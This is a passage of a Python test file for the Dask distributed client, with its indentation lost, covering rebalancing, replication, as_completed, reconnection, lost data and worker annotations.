assert len(b.data) == 1
assert len(c.data) == 1
assert len(d.data) == 1
s.validate_state()
@gen_cluster(client=True)
async def test_rebalance_execution(c, s, a, b):
futures = c.map(inc, range(10), workers=a.address)
await c.rebalance(futures)
assert len(a.data) == len(b.data) == 5
s.validate_state()
def test_rebalance_sync(c, s, a, b):
futures = c.map(inc, range(10), workers=[a["address"]])
c.rebalance(futures)
has_what = c.has_what()
assert len(has_what) == 2
assert list(valmap(len, has_what).values()) == [5, 5]
@gen_cluster(client=True)
async def test_rebalance_unprepared(c, s, a, b):
futures = c.map(slowinc, range(10), delay=0.05, workers=a.address)
await asyncio.sleep(0.1)
await c.rebalance(futures)
s.validate_state()
@gen_cluster(client=True)
async def test_rebalance_raises_missing_data(c, s, a, b):
with pytest.raises(ValueError, match="keys were found to be missing"):
futures = await c.scatter(range(100))
keys = [f.key for f in futures]
del futures
await c.rebalance(keys)
@gen_cluster(client=True)
async def test_receive_lost_key(c, s, a, b):
x = c.submit(inc, 1, workers=[a.address])
await x
await a.close()
start = time()
while x.status == "finished":
assert time() < start + 5
await asyncio.sleep(0.01)
@pytest.mark.skipif(
not sys.platform.startswith("linux"), reason="Need 127.0.0.2 to mean localhost"
)
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_unrunnable_task_runs(c, s, a, b):
x = c.submit(inc, 1, workers=[a.ip])
await x
await a.close()
start = time()
while x.status == "finished":
assert time() < start + 5
await asyncio.sleep(0.01)
assert s.tasks[x.key] in s.unrunnable
assert s.get_task_status(keys=[x.key]) == {x.key: "no-worker"}
w = await Worker(s.address, loop=s.loop)
start = time()
while x.status != "finished":
assert time() < start + 2
await asyncio.sleep(0.01)
assert s.tasks[x.key] not in s.unrunnable
result = await x
assert result == 2
await w.close()
@gen_cluster(client=True, nthreads=[])
async def test_add_worker_after_tasks(c, s):
futures = c.map(inc, range(10))
n = await Nanny(s.address, nthreads=2, loop=s.loop, port=0)
await c.gather(futures)
await n.close()
@pytest.mark.skipif(
not sys.platform.startswith("linux"), reason="Need 127.0.0.2 to mean localhost"
)
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_workers_register_indirect_data(c, s, a, b):
[x] = await c.scatter([1], workers=a.address)
y = c.submit(inc, x, workers=b.ip)
await y
assert b.data[x.key] == 1
assert s.tasks[x.key].who_has == {s.workers[a.address], s.workers[b.address]}
assert s.workers[b.address].has_what == {s.tasks[x.key], s.tasks[y.key]}
s.validate_state()
@gen_cluster(client=True)
async def test_submit_on_cancelled_future(c, s, a, b):
x = c.submit(inc, 1)
await x
await c.cancel(x)
with pytest.raises(CancelledError):
c.submit(inc, x)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
async def test_replicate(c, s, *workers):
[a, b] = await c.scatter([1, 2])
await s.replicate(keys=[a.key, b.key], n=5)
s.validate_state()
assert len(s.tasks[a.key].who_has) == 5
assert len(s.tasks[b.key].who_has) == 5
assert sum(a.key in w.data for w in workers) == 5
assert sum(b.key in w.data for w in workers) == 5
@gen_cluster(client=True)
async def test_replicate_tuple_keys(c, s, a, b):
x = delayed(inc)(1, dask_key_name=("x", 1))
f = c.persist(x)
await c.replicate(f, n=5)
s.validate_state()
assert a.data and b.data
await c.rebalance(f)
s.validate_state()
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
async def test_replicate_workers(c, s, *workers):
[a, b] = await c.scatter([1, 2], workers=[workers[0].address])
await s.replicate(
keys=[a.key, b.key], n=5, workers=[w.address for w in workers[:5]]
)
assert len(s.tasks[a.key].who_has) == 5
assert len(s.tasks[b.key].who_has) == 5
assert sum(a.key in w.data for w in workers[:5]) == 5
assert sum(b.key in w.data for w in workers[:5]) == 5
assert sum(a.key in w.data for w in workers[5:]) == 0
assert sum(b.key in w.data for w in workers[5:]) == 0
await s.replicate(keys=[a.key, b.key], n=1)
assert len(s.tasks[a.key].who_has) == 1
assert len(s.tasks[b.key].who_has) == 1
assert sum(a.key in w.data for w in workers) == 1
assert sum(b.key in w.data for w in workers) == 1
s.validate_state()
await s.replicate(keys=[a.key, b.key], n=None) # all
assert len(s.tasks[a.key].who_has) == 10
assert len(s.tasks[b.key].who_has) == 10
s.validate_state()
await s.replicate(
keys=[a.key, b.key], n=1, workers=[w.address for w in workers[:5]]
)
assert sum(a.key in w.data for w in workers[:5]) == 1
assert sum(b.key in w.data for w in workers[:5]) == 1
assert sum(a.key in w.data for w in workers[5:]) == 5
assert sum(b.key in w.data for w in workers[5:]) == 5
s.validate_state()
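# Replication semantics exercised above, roughly: ``n`` is the target number of
# copies per key, ``n=None`` means "one copy on every eligible worker", and
# ``workers=`` restricts which workers copies are added to or removed from --
# copies held outside that subset are left untouched.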
class CountSerialization:
def __init__(self):
self.n = 0
def __setstate__(self, n):
self.n = n + 1
def __getstate__(self):
return self.n
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
async def test_replicate_tree_branching(c, s, *workers):
obj = CountSerialization()
[future] = await c.scatter([obj])
await s.replicate(keys=[future.key], n=10)
max_count = max(w.data[future.key].n for w in workers)
assert max_count > 1
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
async def test_client_replicate(c, s, *workers):
x = c.submit(inc, 1)
y = c.submit(inc, 2)
await c.replicate([x, y], n=5)
assert len(s.tasks[x.key].who_has) == 5
assert len(s.tasks[y.key].who_has) == 5
await c.replicate([x, y], n=3)
assert len(s.tasks[x.key].who_has) == 3
assert len(s.tasks[y.key].who_has) == 3
await c.replicate([x, y])
s.validate_state()
assert len(s.tasks[x.key].who_has) == 10
assert len(s.tasks[y.key].who_has) == 10
@pytest.mark.skipif(
not sys.platform.startswith("linux"), reason="Need 127.0.0.2 to mean localhost"
)
@gen_cluster(
client=True,
nthreads=[("127.0.0.1", 1), ("127.0.0.2", 1), ("127.0.0.2", 1)],
timeout=None,
)
async def test_client_replicate_host(client, s, a, b, c):
aws = s.workers[a.address]
bws = s.workers[b.address]
cws = s.workers[c.address]
x = client.submit(inc, 1, workers="127.0.0.2")
await wait([x])
assert s.tasks[x.key].who_has == {bws} or s.tasks[x.key].who_has == {cws}
await client.replicate([x], workers=["127.0.0.2"])
assert s.tasks[x.key].who_has == {bws, cws}
await client.replicate([x], workers=["127.0.0.1"])
assert s.tasks[x.key].who_has == {aws, bws, cws}
def test_client_replicate_sync(c):
x = c.submit(inc, 1)
y = c.submit(inc, 2)
c.replicate([x, y], n=2)
who_has = c.who_has()
assert len(who_has[x.key]) == len(who_has[y.key]) == 2
with pytest.raises(ValueError):
c.replicate([x], n=0)
assert y.result() == 3
@pytest.mark.skipif(WINDOWS, reason="Windows timer too coarse-grained")
@gen_cluster(client=True, nthreads=[("127.0.0.1", 4)] * 1)
async def test_task_load_adapts_quickly(c, s, a):
future = c.submit(slowinc, 1, delay=0.2) # slow
await wait(future)
assert 0.15 < s.task_prefixes["slowinc"].duration_average < 0.4
futures = c.map(slowinc, range(10), delay=0) # very fast
await wait(futures)
assert 0 < s.task_prefixes["slowinc"].duration_average < 0.1
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 2)
async def test_even_load_after_fast_functions(c, s, a, b):
x = c.submit(inc, 1, workers=a.address) # very fast
y = c.submit(inc, 2, workers=b.address) # very fast
await wait([x, y])
futures = c.map(inc, range(2, 11))
await wait(futures)
assert any(f.key in a.data for f in futures)
assert any(f.key in b.data for f in futures)
# assert abs(len(a.data) - len(b.data)) <= 3
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 2)
async def test_even_load_on_startup(c, s, a, b):
x, y = c.map(inc, [1, 2])
await wait([x, y])
assert len(a.data) == len(b.data) == 1
@pytest.mark.skip
@gen_cluster(client=True, nthreads=[("127.0.0.1", 2)] * 2)
async def test_contiguous_load(c, s, a, b):
w, x, y, z = c.map(inc, [1, 2, 3, 4])
await wait([w, x, y, z])
groups = [set(a.data), set(b.data)]
assert {w.key, x.key} in groups
assert {y.key, z.key} in groups
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test_balanced_with_submit(c, s, *workers):
L = [c.submit(slowinc, i) for i in range(4)]
await wait(L)
for w in workers:
assert len(w.data) == 1
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test_balanced_with_submit_and_resident_data(c, s, *workers):
[x] = await c.scatter([10], broadcast=True)
L = [c.submit(slowinc, x, pure=False) for i in range(4)]
await wait(L)
for w in workers:
assert len(w.data) == 2
@gen_cluster(client=True, nthreads=[("127.0.0.1", 20)] * 2)
async def test_scheduler_saturates_cores(c, s, a, b):
for delay in [0, 0.01, 0.1]:
futures = c.map(slowinc, range(100), delay=delay)
futures = c.map(slowinc, futures, delay=delay / 10)
while not s.tasks:
if s.tasks:
assert all(
len(p) >= 20
for w in s.workers.values()
for p in w.processing.values()
)
await asyncio.sleep(0.01)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 20)] * 2)
async def test_scheduler_saturates_cores_random(c, s, a, b):
for delay in [0, 0.01, 0.1]:
futures = c.map(randominc, range(100), scale=0.1)
while not s.tasks:
if s.tasks:
assert all(
len(p) >= 20
for w in s.workers.values()
for p in w.processing.values()
)
await asyncio.sleep(0.01)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test_cancel_clears_processing(c, s, *workers):
da = pytest.importorskip("dask.array")
x = c.submit(slowinc, 1, delay=0.2)
while not s.tasks:
await asyncio.sleep(0.01)
await c.cancel(x)
start = time()
while any(v for w in s.workers.values() for v in w.processing):
assert time() < start + 0.2
await asyncio.sleep(0.01)
s.validate_state()
def test_default_get():
with cluster() as (s, [a, b]):
pre_get = dask.base.get_scheduler()
pytest.raises(KeyError, dask.config.get, "shuffle")
with Client(s["address"], set_as_default=True) as c:
assert dask.base.get_scheduler() == c.get
assert dask.config.get("shuffle") == "tasks"
assert dask.base.get_scheduler() == pre_get
pytest.raises(KeyError, dask.config.get, "shuffle")
c = Client(s["address"], set_as_default=False)
assert dask.base.get_scheduler() == pre_get
pytest.raises(KeyError, dask.config.get, "shuffle")
c.close()
c = Client(s["address"], set_as_default=True)
assert dask.config.get("shuffle") == "tasks"
assert dask.base.get_scheduler() == c.get
c.close()
assert dask.base.get_scheduler() == pre_get
pytest.raises(KeyError, dask.config.get, "shuffle")
with Client(s["address"]) as c:
assert dask.base.get_scheduler() == c.get
with Client(s["address"], set_as_default=False) as c:
assert dask.base.get_scheduler() != c.get
assert dask.base.get_scheduler() != c.get
with Client(s["address"], set_as_default=True) as c1:
assert dask.base.get_scheduler() == c1.get
with Client(s["address"], set_as_default=True) as c2:
assert dask.base.get_scheduler() == c2.get
assert dask.base.get_scheduler() == c1.get
assert dask.base.get_scheduler() == pre_get
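# ``set_as_default=True`` (the default) registers the client as dask's global
# scheduler, so bare ``.compute()`` calls on collections route through it;
# closing the client, or leaving its ``with`` block, restores whatever was
# configured before, and nested defaults unwind in LIFO order, as stepped
# through above.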
@gen_cluster(client=True)
async def test_get_processing(c, s, a, b):
processing = await c.processing()
assert processing == valmap(tuple, s.processing)
futures = c.map(
slowinc, range(10), delay=0.1, workers=[a.address], allow_other_workers=True
)
await asyncio.sleep(0.2)
x = await c.processing()
assert set(x) == {a.address, b.address}
x = await c.processing(workers=[a.address])
assert isinstance(x[a.address], (list, tuple))
@gen_cluster(client=True)
async def test_get_foo(c, s, a, b):
futures = c.map(inc, range(10))
await wait(futures)
x = await c.scheduler.ncores()
assert x == s.nthreads
x = await c.scheduler.ncores(workers=[a.address])
assert x == {a.address: s.nthreads[a.address]}
x = await c.scheduler.has_what()
assert valmap(sorted, x) == valmap(sorted, s.has_what)
x = await c.scheduler.has_what(workers=[a.address])
assert valmap(sorted, x) == {a.address: sorted(s.has_what[a.address])}
x = await c.scheduler.nbytes(summary=False)
assert x == s.get_nbytes(summary=False)
x = await c.scheduler.nbytes(keys=[futures[0].key], summary=False)
assert x == {futures[0].key: s.tasks[futures[0].key].nbytes}
x = await c.scheduler.who_has()
assert valmap(sorted, x) == valmap(sorted, s.who_has)
x = await c.scheduler.who_has(keys=[futures[0].key])
assert valmap(sorted, x) == {futures[0].key: sorted(s.who_has[futures[0].key])}
def assert_dict_key_equal(expected, actual):
assert set(expected.keys()) == set(actual.keys())
for k in actual.keys():
ev = expected[k]
av = actual[k]
assert list(ev) == list(av)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 3)
async def test_get_foo_lost_keys(c, s, u, v, w):
x = c.submit(inc, 1, workers=[u.address])
y = await c.scatter(3, workers=[v.address])
await wait([x, y])
ua, va, wa = u.address, v.address, w.address
d = await c.scheduler.has_what()
assert_dict_key_equal(d, {ua: [x.key], va: [y.key], wa: []})
d = await c.scheduler.has_what(workers=[ua, va])
assert_dict_key_equal(d, {ua: [x.key], va: [y.key]})
d = await c.scheduler.who_has()
assert_dict_key_equal(d, {x.key: [ua], y.key: [va]})
d = await c.scheduler.who_has(keys=[x.key, y.key])
assert_dict_key_equal(d, {x.key: [ua], y.key: [va]})
await u.close()
await v.close()
d = await c.scheduler.has_what()
assert_dict_key_equal(d, {wa: []})
d = await c.scheduler.has_what(workers=[ua, va])
assert_dict_key_equal(d, {ua: [], va: []})
# The scattered key cannot be recomputed so it is forgotten
d = await c.scheduler.who_has()
assert_dict_key_equal(d, {x.key: []})
# ... but when passed explicitly, it is included in the result
d = await c.scheduler.who_has(keys=[x.key, y.key])
assert_dict_key_equal(d, {x.key: [], y.key: []})
@pytest.mark.slow
@gen_cluster(
client=True, Worker=Nanny, clean_kwargs={"threads": False, "processes": False}
)
async def test_bad_tasks_fail(c, s, a, b):
f = c.submit(sys.exit, 0)
with captured_logger(logging.getLogger("distributed.scheduler")) as logger:
with pytest.raises(KilledWorker) as info:
await f
text = logger.getvalue()
assert f.key in text
assert info.value.last_worker.nanny in {a.address, b.address}
await asyncio.gather(a.close(), b.close())
def test_get_processing_sync(c, s, a, b):
processing = c.processing()
assert not any(v for v in processing.values())
futures = c.map(
slowinc, range(10), delay=0.1, workers=[a["address"]], allow_other_workers=False
)
sleep(0.2)
aa = a["address"]
bb = b["address"]
processing = c.processing()
assert set(c.processing(aa)) == {aa}
assert set(c.processing([aa])) == {aa}
c.cancel(futures)
def test_close_idempotent(c):
c.close()
c.close()
c.close()
@nodebug
def test_get_returns_early(c):
start = time()
with suppress(RuntimeError):
result = c.get({"x": (throws, 1), "y": (sleep, 1)}, ["x", "y"])
assert time() < start + 0.5
# Futures should be released and forgotten
wait_for(lambda: not c.futures, timeout=0.1)
wait_for(lambda: not any(c.processing().values()), timeout=3)
x = c.submit(inc, 1)
x.result()
with suppress(RuntimeError):
result = c.get({"x": (throws, 1), x.key: (inc, 1)}, ["x", x.key])
assert x.key in c.futures
@pytest.mark.slow
@gen_cluster(Worker=Nanny, client=True)
async def test_Client_clears_references_after_restart(c, s, a, b):
x = c.submit(inc, 1)
assert x.key in c.refcount
await c.restart()
assert x.key not in c.refcount
key = x.key
del x
import gc
gc.collect()
await asyncio.sleep(0)
assert key not in c.refcount
@gen_cluster(Worker=Nanny, client=True)
async def test_restart_timeout_is_logged(c, s, a, b):
with captured_logger(logging.getLogger("distributed.client")) as logger:
await c.restart(timeout="0.5s")
text = logger.getvalue()
assert "Restart timed out after 0.50 seconds" in text
def test_get_stops_work_after_error(c):
with pytest.raises(RuntimeError):
c.get({"x": (throws, 1), "y": (sleep, 1.5)}, ["x", "y"])
start = time()
while any(c.processing().values()):
sleep(0.01)
assert time() < start + 0.5
def test_as_completed_list(c):
seq = c.map(inc, range(5))
seq2 = list(as_completed(seq))
assert set(c.gather(seq2)) == {1, 2, 3, 4, 5}
def test_as_completed_results(c):
seq = c.map(inc, range(5))
seq2 = list(as_completed(seq, with_results=True))
assert set(pluck(1, seq2)) == {1, 2, 3, 4, 5}
assert set(pluck(0, seq2)) == set(seq)
@pytest.mark.parametrize("with_results", [True, False])
def test_as_completed_batches(c, with_results):
n = 50
futures = c.map(slowinc, range(n), delay=0.01)
out = []
for batch in as_completed(futures, with_results=with_results).batches():
assert isinstance(batch, (tuple, list))
sleep(0.05)
out.extend(batch)
assert len(out) == n
if with_results:
assert set(pluck(1, out)) == set(range(1, n + 1))
else:
assert set(out) == set(futures)
def test_as_completed_next_batch(c):
futures = c.map(slowinc, range(2), delay=0.1)
ac = as_completed(futures)
assert not ac.is_empty()
assert ac.next_batch(block=False) == []
assert set(ac.next_batch(block=True)).issubset(futures)
while not ac.is_empty():
assert set(ac.next_batch(block=True)).issubset(futures)
assert ac.is_empty()
assert not ac.has_ready()
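# as_completed() yields futures in completion order rather than submission
# order, optionally in batches or paired with their results.  A typical
# consumption loop (not part of the original suite), assuming a synchronous
# ``client`` and a hypothetical ``handle`` callback:
def _example_as_completed_loop(client, handle):
    futures = client.map(slowinc, range(10), delay=0.1)
    for future, result in as_completed(futures, with_results=True):
        handle(result)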
@gen_test()
async def test_status():
s = await Scheduler(port=0)
c = await Client(s.address, asynchronous=True)
assert c.status == "running"
x = c.submit(inc, 1)
await c.close()
assert c.status == "closed"
await s.close()
@gen_cluster(client=True)
async def test_persist_optimize_graph(c, s, a, b):
i = 10
for method in [c.persist, c.compute]:
b = db.range(i, npartitions=2)
i += 1
b2 = b.map(inc)
b3 = b2.map(inc)
b4 = method(b3, optimize_graph=False)
await wait(b4)
assert set(map(stringify, b3.__dask_keys__())).issubset(s.tasks)
b = db.range(i, npartitions=2)
i += 1
b2 = b.map(inc)
b3 = b2.map(inc)
b4 = method(b3, optimize_graph=True)
await wait(b4)
assert not any(stringify(k) in s.tasks for k in b2.__dask_keys__())
@gen_cluster(client=True, nthreads=[])
async def test_scatter_raises_if_no_workers(c, s):
with pytest.raises(TimeoutError):
await c.scatter(1, timeout=0.5)
@pytest.mark.slow
def test_reconnect(loop):
w = Worker("127.0.0.1", 9393, loop=loop)
loop.add_callback(w.start)
scheduler_cli = [
"dask-scheduler",
"--host",
"127.0.0.1",
"--port",
"9393",
"--no-dashboard",
]
with popen(scheduler_cli) as s:
c = Client("127.0.0.1:9393", loop=loop)
start = time()
while len(c.nthreads()) != 1:
sleep(0.1)
assert time() < start + 3
x = c.submit(inc, 1)
assert x.result() == 2
start = time()
while c.status != "connecting":
assert time() < start + 5
sleep(0.01)
assert x.status == "cancelled"
with pytest.raises(CancelledError):
x.result()
with popen(scheduler_cli) as s:
start = time()
while c.status != "running":
sleep(0.1)
assert time() < start + 5
start = time()
while len(c.nthreads()) != 1:
sleep(0.05)
assert time() < start + 15
x = c.submit(inc, 1)
assert x.result() == 2
start = time()
while True:
try:
x.result()
assert False
except CommClosedError:
continue
except CancelledError:
break
assert time() < start + 5
sleep(0.1)
sync(loop, w.close)
c.close()
@gen_cluster(client=True, nthreads=[], client_kwargs={"timeout": 0.5})
async def test_reconnect_timeout(c, s):
with captured_logger(logging.getLogger("distributed.client")) as logger:
await s.close()
start = time()
while c.status != "closed":
await c._update_scheduler_info()
await asyncio.sleep(0.05)
assert time() < start + 5, "Timeout waiting for reconnect to fail"
text = logger.getvalue()
assert "Failed to reconnect" in text
@pytest.mark.avoid_ci(reason="hangs on github actions ubuntu-latest CI")
@pytest.mark.slow
@pytest.mark.skipif(WINDOWS, reason="num_fds not supported on windows")
@pytest.mark.parametrize("worker,count,repeat", [(Worker, 100, 5), (Nanny, 10, 20)])
def test_open_close_many_workers(loop, worker, count, repeat):
psutil = pytest.importorskip("psutil")
proc = psutil.Process()
with cluster(nworkers=0, active_rpc_timeout=2) as (s, _):
gc.collect()
before = proc.num_fds()
done = Semaphore(0)
running = weakref.WeakKeyDictionary()
workers = set()
status = True
async def start_worker(sleep, duration, repeat=1):
for i in range(repeat):
await asyncio.sleep(sleep)
if not status:
return
w = worker(s["address"], loop=loop)
running[w] = None
await w
workers.add(w)
addr = w.worker_address
running[w] = addr
await asyncio.sleep(duration)
await w.close()
del w
await asyncio.sleep(0)
done.release()
for i in range(count):
loop.add_callback(
start_worker, random.random() / 5, random.random() / 5, repeat=repeat
)
with Client(s["address"], loop=loop) as c:
sleep(1)
for i in range(count):
done.acquire(timeout=5)
gc.collect()
if not running:
break
start = time()
while c.nthreads():
sleep(0.2)
assert time() < start + 10
while len(workers) < count * repeat:
sleep(0.2)
status = False
[c.sync(w.close) for w in list(workers)]
for w in workers:
assert w.status == Status.closed
start = time()
while proc.num_fds() > before:
print("fds:", before, proc.num_fds())
sleep(0.1)
if time() > start + 10:
if worker == Worker: # this is an esoteric case
print("File descriptors did not clean up")
break
else:
raise ValueError("File descriptors did not clean up")
@gen_cluster(client=False, timeout=None)
async def test_idempotence(s, a, b):
c = await Client(s.address, asynchronous=True)
f = await Client(s.address, asynchronous=True)
# Submit
x = c.submit(inc, 1)
await x
log = list(s.transition_log)
len_single_submit = len(log) # see last assert
y = f.submit(inc, 1)
assert x.key == y.key
await y
await asyncio.sleep(0.1)
log2 = list(s.transition_log)
assert log == log2
# Error
a = c.submit(div, 1, 0)
await wait(a)
assert a.status == "error"
log = list(s.transition_log)
b = f.submit(div, 1, 0)
assert a.key == b.key
await wait(b)
await asyncio.sleep(0.1)
log2 = list(s.transition_log)
assert log == log2
s.transition_log.clear()
# Simultaneous Submit
d = c.submit(inc, 2)
e = c.submit(inc, 2)
await wait([d, e])
assert len(s.transition_log) == len_single_submit
await c.close()
await f.close()
def test_scheduler_info(c):
info = c.scheduler_info()
assert isinstance(info, dict)
assert len(info["workers"]) == 2
assert isinstance(info["started"], float)
def test_write_scheduler_file(c):
info = c.scheduler_info()
with tmpfile("json") as scheduler_file:
c.write_scheduler_file(scheduler_file)
with Client(scheduler_file=scheduler_file) as c2:
info2 = c2.scheduler_info()
assert c.scheduler.address == c2.scheduler.address
# test that a ValueError is raised if the scheduler_file
# attribute is already set
with pytest.raises(ValueError):
c.write_scheduler_file(scheduler_file)
def test_get_versions(c):
requests = pytest.importorskip("requests")
v = c.get_versions()
assert v["scheduler"] is not None
assert v["client"] is not None
assert len(v["workers"]) == 2
for k, v in v["workers"].items():
assert v is not None
c.get_versions(check=True)
    # smoke test that fetching and checking versions does not raise
v = c.get_versions(packages=["requests"])
assert v["client"]["packages"]["requests"] == requests.__version__
@gen_cluster(client=True)
async def test_async_get_versions(c, s, a, b):
await c.get_versions(check=True)
def test_threaded_get_within_distributed(c):
import dask.multiprocessing
for get in [dask.local.get_sync, dask.multiprocessing.get, dask.threaded.get]:
def f():
return get({"x": (lambda: 1,)}, "x")
future = c.submit(f)
assert future.result() == 1
@gen_cluster(client=True)
async def test_lose_scattered_data(c, s, a, b):
[x] = await c.scatter([1], workers=a.address)
await a.close()
await asyncio.sleep(0.1)
assert x.status == "cancelled"
assert x.key not in s.tasks
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 3)
async def test_partially_lose_scattered_data(e, s, a, b, c):
x = await e.scatter(1, workers=a.address)
await e.replicate(x, n=2)
await a.close()
await asyncio.sleep(0.1)
assert x.status == "finished"
assert s.get_task_status(keys=[x.key]) == {x.key: "memory"}
@gen_cluster(client=True)
async def test_scatter_compute_lose(c, s, a, b):
[x] = await c.scatter([[1, 2, 3, 4]], workers=a.address)
y = c.submit(inc, 1, workers=b.address)
z = c.submit(slowadd, x, y, delay=0.2)
await asyncio.sleep(0.1)
await a.close()
with pytest.raises(CancelledError):
await wait(z)
assert x.status == "cancelled"
assert y.status == "finished"
assert z.status == "cancelled"
@gen_cluster(client=True)
async def test_scatter_compute_store_lose(c, s, a, b):
"""
    Create irreplaceable data on one machine, then let a dependent computation
    occur and complete on another.  Kill the machine holding the irreplaceable
    data.  What happens to the completed result?  And what happens after it is
    garbage collected and we try to bring it back?
"""
x = await c.scatter(1, workers=a.address)
xx = c.submit(inc, x, workers=a.address)
y = c.submit(inc, 1)
z = c.submit(slowadd, xx, y, delay=0.2, workers=b.address)
await wait(z)
await a.close()
start = time()
while x.status == "finished":
await asyncio.sleep(0.01)
assert time() < start + 2
# assert xx.status == 'finished'
assert y.status == "finished"
assert z.status == "finished"
zz = c.submit(inc, z)
await wait(zz)
zkey = z.key
del z
start = time()
while s.get_task_status(keys=[zkey]) != {zkey: "released"}:
await asyncio.sleep(0.01)
assert time() < start + 2
xxkey = xx.key
del xx
start = time()
while x.key in s.tasks and zkey not in s.tasks and xxkey not in s.tasks:
await asyncio.sleep(0.01)
assert time() < start + 2
@gen_cluster(client=True)
async def test_scatter_compute_store_lose_processing(c, s, a, b):
"""
    Create irreplaceable data on one machine, then start a dependent computation
    on another.  Kill the machine holding the irreplaceable data while that
    computation is still in flight.  What happens to the dependent results?
"""
[x] = await c.scatter([1], workers=a.address)
y = c.submit(slowinc, x, delay=0.2)
z = c.submit(inc, y)
await asyncio.sleep(0.1)
await a.close()
start = time()
while x.status == "finished":
await asyncio.sleep(0.01)
assert time() < start + 2
assert y.status == "cancelled"
assert z.status == "cancelled"
@gen_cluster(client=False)
async def test_serialize_future(s, a, b):
c1 = await Client(s.address, asynchronous=True)
c2 = await Client(s.address, asynchronous=True)
future = c1.submit(lambda: 1)
result = await future
for ci in (c1, c2):
for ctxman in ci.as_current, lambda: temp_default_client(ci):
with ctxman():
future2 = pickle.loads(pickle.dumps(future))
assert future2.client is ci
assert stringify(future2.key) in ci.futures
result2 = await future2
assert result == result2
await c1.close()
await c2.close()
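# Futures pickle as little more than their key: unpickling rebinds the future
# to whichever client is current in that context (via as_current() or
# temp_default_client), which is why ``future2.client`` is bound to each of c1
# and c2 in turn above.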
@gen_cluster(client=False)
async def test_temp_default_client(s, a, b):
c1 = await Client(s.address, asynchronous=True)
c2 = await Client(s.address, asynchronous=True)
with temp_default_client(c1):
assert default_client() is c1
assert default_client(c2) is c2
with temp_default_client(c2):
assert default_client() is c2
assert default_client(c1) is c1
await c1.close()
await c2.close()
@gen_cluster(client=True)
async def test_as_current(c, s, a, b):
c1 = await Client(s.address, asynchronous=True)
c2 = await Client(s.address, asynchronous=True)
with temp_default_client(c):
assert Client.current() is c
with pytest.raises(ValueError):
Client.current(allow_global=False)
with c1.as_current():
assert Client.current() is c1
assert Client.current(allow_global=True) is c1
with c2.as_current():
assert Client.current() is c2
assert Client.current(allow_global=True) is c2
await c1.close()
await c2.close()
def test_as_current_is_thread_local(s):
l1 = threading.Lock()
l2 = threading.Lock()
l3 = threading.Lock()
l4 = threading.Lock()
l1.acquire()
l2.acquire()
l3.acquire()
l4.acquire()
def run1():
with Client(s["address"]) as c:
with c.as_current():
l1.acquire()
l2.release()
try:
# This line runs only when both run1 and run2 are inside the
# context manager
assert Client.current(allow_global=False) is c
finally:
l3.acquire()
l4.release()
def run2():
with Client(s["address"]) as c:
with c.as_current():
l1.release()
l2.acquire()
try:
# This line runs only when both run1 and run2 are inside the
# context manager
assert Client.current(allow_global=False) is c
finally:
l3.release()
l4.acquire()
t1 = threading.Thread(target=run1)
t2 = threading.Thread(target=run2)
t1.start()
t2.start()
t1.join()
t2.join()
@gen_cluster(client=False)
async def test_as_current_is_task_local(s, a, b):
l1 = asyncio.Lock()
l2 = asyncio.Lock()
l3 = asyncio.Lock()
l4 = asyncio.Lock()
await l1.acquire()
await l2.acquire()
await l3.acquire()
await l4.acquire()
async def run1():
async with Client(s.address, asynchronous=True) as c:
with c.as_current():
await l1.acquire()
l2.release()
try:
# This line runs only when both run1 and run2 are inside the
# context manager
assert Client.current(allow_global=False) is c
finally:
await l3.acquire()
l4.release()
async def run2():
async with Client(s.address, asynchronous=True) as c:
with c.as_current():
l1.release()
await l2.acquire()
try:
# This line runs only when both run1 and run2 are inside the
# context manager
assert Client.current(allow_global=False) is c
finally:
l3.release()
await l4.acquire()
await asyncio.gather(run1(), run2())
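# The "current" client set by as_current() is tracked per thread and per
# asyncio task, so the two coroutines above each observe their own client even
# though they interleave on a single event loop.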
@nodebug # test timing is fragile
@gen_cluster(nthreads=[("127.0.0.1", 1)] * 3, client=True)
async def test_persist_workers_annotate(e, s, a, b, c):
with dask.annotate(workers=a.address, allow_other_workers=False):
L1 = [delayed(inc)(i) for i in range(4)]
with dask.annotate(workers=b.address, allow_other_workers=False):
total = delayed(sum)(L1)
with dask.annotate(workers=c.address, allow_other_workers=True):
L2 = [delayed(add)(i, total) for i in L1]
with dask.annotate(workers=b.address, allow_other_workers=True):
total2 = delayed(sum)(L2)
# TODO: once annotations are faithfully forwarded upon graph optimization,
# we shouldn't need to disable that here.
out = e.persist(L1 + L2 + [total, total2], optimize_graph=False)
await wait(out)
assert all(v.key in a.data for v in L1)
assert total.key in b.data
assert s.loose_restrictions == {total2.key} | {v.key for v in L2}
@nodebug # test timing is fragile
@gen_cluster(nthreads=[("127.0.0.1", 1)] * 3, client=True)
async def test_persist_workers(e, s, a, b, c):
L1 = [delayed(inc)(i) for i in range(4)]
total = delayed(sum)(L1)
L2 = [delayed(add)(i, total) for i in L1]
total2 = delayed(sum)(L2)
out = e.persist(
L1 + L2 + [total, total2],
workers=[a.address, b.address],
allow_other_workers=True,
)
await wait(out)
for v in L1 + L2 + [total, total2]:
assert s.worker_restrictions[v.key] == {a.address, b.address}
assert not any(c.address in r for r in s.worker_restrictions)
assert s.loose_restrictions == {total.key, total2.key} | {v.key for v in L1 + L2}
@gen_cluster(nthreads=[("127.0.0.1", 1)] * 3, client=True)
async def test_compute_workers_annotate(e, s, a, b, c):
with dask.annotate(workers=a.address, allow_other_workers=True):
L1 = [delayed(inc)(i) for i in range(4)]
with dask.annotate(workers=b.address, allow_other_workers=True):
total = delayed(sum)(L1)
with dask.annotate(workers=[c.address]):
L2 = [delayed(add)(i, total) for i in L1]
# TODO: once annotations are faithfully forwarded upon graph optimization,
# we shouldn't need to disable that here.
out = e.compute(L1 + L2 + [total], optimize_graph=False)
await wait(out)
for v in L1:
